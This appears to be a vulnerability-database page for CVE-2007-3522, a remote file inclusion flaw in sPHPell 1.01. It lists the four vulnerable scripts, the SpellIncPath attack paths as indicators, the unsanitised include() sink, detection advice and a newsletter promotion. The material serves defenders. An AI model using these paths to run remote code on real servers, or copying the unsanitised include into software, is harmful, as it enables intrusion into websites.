cbcvebase.
CVE-2007-3522
published 2007-07-03

CVE-2007-3522: Multiple PHP remote file inclusion vulnerabilities in sPHPell 1.01 allow remote attackers to execute arbitrary PHP code via a URL in the SpellIncPath parameter…

PriorityP351medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
66.16%
99.2th percentile
Multiple PHP remote file inclusion vulnerabilities in sPHPell 1.01 allow remote attackers to execute arbitrary PHP code via a URL in the SpellIncPath parameter to (1) spellcheckpageinc.php, (2) spellchecktext.php, (3) spellcheckwindow.php, or (4) spellcheckwindowframeset.php.

Affected

1 ranges
VendorProductVersion rangeFixed in
sphpellsphpell

Detection & IOCsextracted from sources · hover to see the quote

path/checkpageinc.php?SpellIncPath=
path/spellchecktext.php?SpellIncPath=
path/spellcheckwindow.php?SpellIncPath=
path/spellcheckwindowframeset.php?SpellIncPath=
filenamespellcheckpageinc.php
filenamespellchecktext.php
filenamespellcheckwindow.php
filenamespellcheckwindowframeset.php
  • Detect RFI exploitation attempts by monitoring HTTP requests containing the 'SpellIncPath' parameter with an external URL value (e.g., http://) targeting any of the four vulnerable sPHPell scripts.
  • The vulnerable sink is a bare `include($SpellIncPath."spellcheckvars.php")` call — any user-controlled URL prefix in SpellIncPath will cause remote code execution. Alert on GET/POST requests where SpellIncPath value begins with 'http://' or 'https://'.
  • ·The vulnerability only exists when PHP's 'allow_url_include' (and 'allow_url_fopen') directives are enabled, which is required for remote file inclusion to succeed.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.